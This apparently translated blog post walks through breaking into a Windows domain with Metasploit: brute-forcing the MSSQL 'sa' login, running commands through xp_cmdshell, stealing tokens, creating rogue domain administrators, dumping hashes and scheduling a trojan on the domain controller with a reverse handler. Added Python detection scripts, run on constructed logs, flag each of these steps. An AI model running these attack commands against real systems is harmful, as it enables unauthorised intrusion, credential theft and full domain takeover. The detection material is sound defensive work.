Overall framework diagram (figures 1 and 2 not reproduced here)
Using MSF
use auxiliary/scanner/portscan/tcp
This sweeps the relevant ports.
Once port 1433 is found open, brute-force the MSSQL login:
mssql_login
After the password is cracked (success here depends mainly on the dictionary), use MSSQL's characteristic feature, xp_cmdshell, to run operating-system commands:
use auxiliary/scanner/mssql/mssql_exec
set RHOST <target IP>
set USERNAME sa
set PASSWORD <password>
set CMD whoami    // this is the key option: the command to run
exploit
To add a user instead:
set CMD net user Kaifeng kaifeng /add
exploit
After each run, set CMD again with the next command before running it:
set CMD net localgroup administrators Kaifeng /add
exploit
The attack is complete.
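As an added example, not from the original post or from Metasploit, here is the defender's view of the chain just described: a Python detection that counts failed 'sa' logins per client address in a sliding window, flags a success that immediately follows such a burst, and flags cmd.exe spawned by sqlservr.exe (the footprint xp_cmdshell leaves), tagging command lines that create accounts or change the administrators group. The error-log lines and process records are constructed: the host SQL01, the times and the client addresses are made up, and the process records are simplified Sysmon-style dicts rather than raw event XML.

```python
"""Detection for the MSSQL chain above: an 'sa' password-guessing burst, then
cmd.exe spawned by sqlservr.exe (xp_cmdshell), then account and admin-group
changes issued through it. All inputs below are constructed for illustration.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed lines in SQL Server errorlog layout (hosts, times, addresses made up).
FAILED = ("Logon  Login failed for user 'sa'. Reason: Password did not match "
          "that for the login provided. [CLIENT: 1.1.1.3]")
SQL_ERRORLOG = [
    "2015-03-14 05:00:10.01 " + FAILED,
    "2015-03-14 05:00:10.20 " + FAILED,
    "2015-03-14 05:00:10.41 " + FAILED,
    "2015-03-14 05:00:10.63 " + FAILED,
    "2015-03-14 05:00:10.88 " + FAILED,
    "2015-03-14 05:00:11.02 Logon  Login succeeded for user 'sa'. "
    "Connection made using SQL Server authentication. [CLIENT: 1.1.1.3]",
    "2015-03-14 05:07:30.00 Logon  Login failed for user 'sa'. Reason: Password "
    "did not match that for the login provided. [CLIENT: 10.0.0.8]",
]

# Constructed, simplified Sysmon event-1 style records (not raw events).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PROCESS_EVENTS = [
    {"ts": "2015-03-14 05:00:40", "host": "SQL01", "parent": SQLSERVR, "image": CMD,
     "cmdline": "cmd.exe /c whoami"},
    {"ts": "2015-03-14 05:01:05", "host": "SQL01", "parent": SQLSERVR, "image": CMD,
     "cmdline": "cmd.exe /c net user Kaifeng kaifeng /add"},
    {"ts": "2015-03-14 05:01:20", "host": "SQL01", "parent": SQLSERVR, "image": CMD,
     "cmdline": "cmd.exe /c net localgroup administrators Kaifeng /add"},
    # Benign interactive shell: same image, but parent is explorer.exe.
    {"ts": "2015-03-14 05:02:00", "host": "SQL01", "parent": r"C:\Windows\explorer.exe",
     "image": CMD, "cmdline": "cmd.exe"},
]

LOGIN_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
ACCOUNT_ADD = re.compile(r"\bnet1?\s+users?\s+.*?/add\b", re.I)
GROUP_ADD = re.compile(r"\bnet1?\s+localgroup\s+administrators\s+.*?/add\b", re.I)


def detect_sql_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failed logins per (client, user).

    Returns {(client, user): {"failures": n, "success_after": bool}} for every
    source that reached `threshold` failures inside `window`; a success right
    after the burst is the strongest signal that the guess landed."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        m = LOGIN_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        key = (m["client"], m["user"])
        if m["result"] == "succeeded":
            if key in alerts:
                alerts[key]["success_after"] = True
            continue
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:      # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(key, {"failures": 0, "success_after": False})
            a["failures"] = max(a["failures"], len(q))
    return alerts


def detect_xp_cmdshell(events):
    """Flag cmd.exe whose parent is sqlservr.exe (how xp_cmdshell runs its
    command) and tag command lines that create accounts or touch admin groups."""
    findings = []
    for e in events:
        if not (e["parent"].lower().endswith("\\sqlservr.exe")
                and e["image"].lower().endswith("\\cmd.exe")):
            continue
        tags = ["xp_cmdshell"]
        if ACCOUNT_ADD.search(e["cmdline"]):
            tags.append("account-creation")
        if GROUP_ADD.search(e["cmdline"]):
            tags.append("admin-group-change")
        findings.append({"ts": e["ts"], "host": e["host"],
                         "cmdline": e["cmdline"], "tags": tags})
    return findings


if __name__ == "__main__":
    for key, info in detect_sql_bruteforce(SQL_ERRORLOG).items():
        print("brute force:", key, info)
    for f in detect_xp_cmdshell(PROCESS_EVENTS):
        print("xp_cmdshell:", f["ts"], f["host"], f["tags"], f["cmdline"])
```

The parent-process check is the part that matters: xp_cmdshell always runs its command through cmd.exe under the SQL Server service process, so cmd.exe with sqlservr.exe as parent is rare on a healthy server, whereas cmd.exe on its own is not. The burst rule alone would miss a slow, dictionary-paced attack, which is why the success-after-failures flag is kept separately.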
Using psexec
Set up a reverse connection and get a Meterpreter session.
run getgui -e
use auxiliary/scanner/portscan/tcp
exploit
This confirms that 3389 is open.
Now steal tokens:
use incognito
list_tokens -u
impersonate_token <one of the tokens listed above>
If it succeeds, you now hold the identity taken from the other host; enter shell and run whoami to check.
Then create a domain administrator account to log in with and manage the whole domain:
net user Kaifeng Kaifeng /add /domain
net localgroup Administrators Kaifeng /add /domain
Then log in with psexec, using the username and password just created.
After the login succeeds you can manage the whole domain.
Dump the hashes of the whole domain with Meterpreter's hashdump.
Once you hold a domain administrator, you can use the exported hashes to take the other machines, or use the token on the other machines: upload a trojan, enter the shell, schedule it to run at a set time, listen in MSF, and you get a session.
Below, as the domain administrator:
meterpreter > upload /var/www/door.exe c:\
meterpreter > shell
C:\windows\system32> dir c:\
Copy it to the DIS9 domain controller:
C:\> copy door.exe \\DIS9TEAM-DOMAIN\c$
C:\>
Get the time on DIS9TEAM-DOMAIN:
C:\> net time \\DIS9TEAM-DOMAIN
C:\>
The time is 05:02, so add a job at 05:04 to run the trojan door.exe, then listen in MSF:
C:\> at \\DIS9TEAM-DOMAIN 05:04 C:\door.exe
C:\> exit
meterpreter > background
[*] Backgrounding session 2 ...
msf exploit(handler) > exploit
[*] Started reverse handler on 1.1.1.3:4444
[*] Starting the payload handler...
This method can be used to take the other machines as well.
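As an added example (not part of the original post), the sequence above leaves a trail a defender can correlate: an executable written to the C$ share of the domain controller (event 5145 with a write access mask), a scheduled task created on the same host shortly afterwards with that file as its command (event 4698), and, earlier, a new account (4720) promptly added to an administrators group (4732). The Python below implements a generic two-event sequence rule and applies it to constructed records; the flat field names are a simplified stand-in for the values inside the real event XML, the hosts, users and times are made up, and the generalization to any two-step pattern is mine, not the page's.

```python
"""Sequence correlation over Windows Security events for the lateral-movement
steps above: a binary dropped on an administrative share and then scheduled on
the same host, a new account promptly added to an administrators group, and
legacy at.exe-style task names. All records are constructed for illustration.
"""
import ntpath
import re
from datetime import datetime, timedelta

EVENTS = [  # constructed, simplified fields (real events carry these in XML)
    {"ts": "2015-03-14 04:50:00", "host": "FILE01", "id": 5145, "user": "DIS9\\alice",
     "share": "\\\\*\\Data", "target": "reports\\q1.xlsx", "access": "WriteData"},
    {"ts": "2015-03-14 04:58:00", "host": "DIS9TEAM-DOMAIN", "id": 4720,
     "user": "DIS9\\Administrator", "target_user": "Kaifeng"},
    {"ts": "2015-03-14 04:58:05", "host": "DIS9TEAM-DOMAIN", "id": 4732,
     "user": "DIS9\\Administrator", "member": "Kaifeng", "group": "Administrators"},
    {"ts": "2015-03-14 05:02:10", "host": "DIS9TEAM-DOMAIN", "id": 5145, "user": "DIS9\\Kaifeng",
     "share": "\\\\*\\C$", "target": "door.exe", "access": "WriteData"},
    {"ts": "2015-03-14 05:02:40", "host": "DIS9TEAM-DOMAIN", "id": 4698, "user": "DIS9\\Kaifeng",
     "task": "\\At1", "command": "C:\\door.exe"},
    {"ts": "2015-03-14 05:03:00", "host": "WS02", "id": 4698, "user": "NT AUTHORITY\\SYSTEM",
     "task": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe"},
]

ADMIN_SHARES = {"C$", "ADMIN$"}
EXECUTABLE = (".exe", ".dll", ".bat", ".cmd", ".ps1")
ADMIN_GROUPS = {"administrators", "domain admins"}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def correlate(events, first, second, link, window):
    """Generic two-step rule: pairs (a, b) where a matches `first`, b matches
    `second`, b occurs on the same host within `window` after a, and link(a, b)
    holds. Events are sorted by time so the inner scan can stop early."""
    evs = sorted(events, key=lambda e: parse_ts(e["ts"]))
    hits = []
    for i, a in enumerate(evs):
        if not first(a):
            continue
        ta = parse_ts(a["ts"])
        for b in evs[i + 1:]:
            if parse_ts(b["ts"]) - ta > window:
                break
            if b["host"] == a["host"] and second(b) and link(a, b):
                hits.append((a, b))
    return hits


def is_admin_share_exe_write(e):
    """5145 write of an executable file to C$ or ADMIN$."""
    share = e.get("share", "").rsplit("\\", 1)[-1].upper()
    return (e["id"] == 5145 and "WriteData" in e["access"]
            and share in ADMIN_SHARES and e["target"].lower().endswith(EXECUTABLE))


def is_task_created(e):
    return e["id"] == 4698


def same_binary(write, task):
    """Link the dropped file to the task by file name (paths differ: share-relative vs. local)."""
    return ntpath.basename(write["target"]).lower() == ntpath.basename(task["command"]).lower()


def staged_binary_scheduled(events, window=timedelta(minutes=10)):
    """Executable written to an admin share, then a task on that host pointing at it."""
    return correlate(events, is_admin_share_exe_write, is_task_created, same_binary, window)


def new_account_made_admin(events, window=timedelta(minutes=10)):
    """4720 (account created) followed by 4732/4728 adding it to an admin group."""
    return correlate(events,
                     lambda e: e["id"] == 4720,
                     lambda e: e["id"] in (4732, 4728) and e["group"].lower() in ADMIN_GROUPS,
                     lambda a, b: a["target_user"].lower() == b["member"].lower(),
                     window)


def legacy_at_jobs(events):
    """Tasks named \\At<n>, the naming the legacy at.exe scheduler uses."""
    return [e for e in events if e["id"] == 4698 and re.fullmatch(r"\\At\d+", e["task"])]


if __name__ == "__main__":
    for w, t in staged_binary_scheduled(EVENTS):
        print(f"[{t['host']}] {w['user']} wrote {w['target']} to {w['share']}, "
              f"then task {t['task']} -> {t['command']}")
    for c, g in new_account_made_admin(EVENTS):
        print(f"[{g['host']}] new account {c['target_user']} added to {g['group']} by {g['user']}")
    for e in legacy_at_jobs(EVENTS):
        print(f"[{e['host']}] legacy at.exe job {e['task']} -> {e['command']}")
```

The write to the Data share on FILE01 and the system defrag task on WS02 are there to show the rules staying quiet on ordinary activity: only an executable on an administrative share followed by a task on the same host that names it is reported. Object-access auditing for file shares (which produces 5145) must be enabled on the domain controller for the first rule to have anything to work with.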
Knowledge expansion
Feature 1: quick privilege escalation
The getsystem command escalates privileges quickly.
Nothing is simpler than this: one command and you have SYSTEM privileges.
Meterpreter tries several techniques to get you SYSTEM privileges.
Feature 2: hashdump
Run this command: run post/windows/gather/hashdump
With one command you get the contents of the Windows SAM database,
that is, the user names and their password hashes.
Feature 3: open 3389 directly
getgui is a newly added Meterpreter command.
It lets you easily enable 3389 remote management on the target system.
It has two uses: run getgui -e (just enables remote management)
run getgui -u hacker -p s3cr3t (enables remote management and creates a new account with username hacker and password s3cr3t)
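As an added example, not from the original post or from Metasploit, the following Python audits a host for the state the getgui feature leaves behind: Remote Desktop enabled through the fDenyTSConnections registry value, and an extra account in the Administrators and Remote Desktop Users groups. The snapshot and baseline dictionaries are constructed (the layout is my own; on a real host they would be filled from reg query and net localgroup output), the hacker account mirrors the page's example, and the assumption that the new account lands in both groups is mine.

```python
"""Configuration audit for the getgui footprint: RDP switched on in the
registry plus an unexpected account with Remote Desktop and admin rights.
This is an added example; the snapshot layout is invented for illustration.
"""
RDP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_VALUE = "fDenyTSConnections"   # 1 = RDP connections denied, 0 = allowed

# Constructed baseline captured while the host was known good.
BASELINE = {
    "registry": {(RDP_KEY, RDP_VALUE): 1},
    "groups": {"Administrators": {"Administrator"}, "Remote Desktop Users": set()},
}

# Constructed snapshot resembling the host after `run getgui -u hacker -p s3cr3t`.
SNAPSHOT = {
    "registry": {(RDP_KEY, RDP_VALUE): 0},
    "groups": {"Administrators": {"Administrator", "hacker"},
               "Remote Desktop Users": {"hacker"}},
}


def audit_rdp_exposure(snapshot, baseline):
    """Compare a host snapshot against its baseline.

    Returns a list of (severity, message). RDP being on is only 'info' when
    the baseline already had it on; any group member absent from the baseline
    is 'high' because that is exactly what a planted account looks like."""
    findings = []
    deny = snapshot["registry"].get((RDP_KEY, RDP_VALUE))
    if deny == 0:
        known = baseline["registry"].get((RDP_KEY, RDP_VALUE)) == 0
        findings.append(("info" if known else "high",
                         "Remote Desktop is enabled (fDenyTSConnections=0)"))
    for group in ("Administrators", "Remote Desktop Users"):
        added = snapshot["groups"].get(group, set()) - baseline["groups"].get(group, set())
        for member in sorted(added):
            findings.append(("high", f"{member} added to {group} since baseline"))
    return findings


def is_rdp_exposed(snapshot, baseline):
    """True when RDP is reachable and at least one unexpected account could use it."""
    msgs = [m for _, m in audit_rdp_exposure(snapshot, baseline)]
    return any("Remote Desktop is enabled" in m for m in msgs) and any("added to" in m for m in msgs)


if __name__ == "__main__":
    for severity, message in audit_rdp_exposure(SNAPSHOT, BASELINE):
        print(f"{severity:5} {message}")
    print("exposed:", is_rdp_exposed(SNAPSHOT, BASELINE))
```

The baseline comparison is what keeps this useful on servers where RDP is legitimately on: there the registry value alone says nothing, and the signal is the membership drift in the two groups.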
Feature 4: network sniffing
Meterpreter has a very strong network sniffing capability.
It can sniff the network without installing any drivers on the target system.
And it is smart enough to ignore its own traffic.
Feature 5: network pivoting
The biggest difficulty hackers attacking a LAN often run into is being unable to get past NAT.
Now, with Meterpreter, it is easy.
Meterpreter can turn a computer you have compromised into a relay for attacking other computers on the same LAN.
This article is from the "Redbull" blog; please keep this source: http://redbull.blog.51cto.com/9796528/1620309
Attacking the client PC through SA privileges and pivoting into the intranet domain (system security category)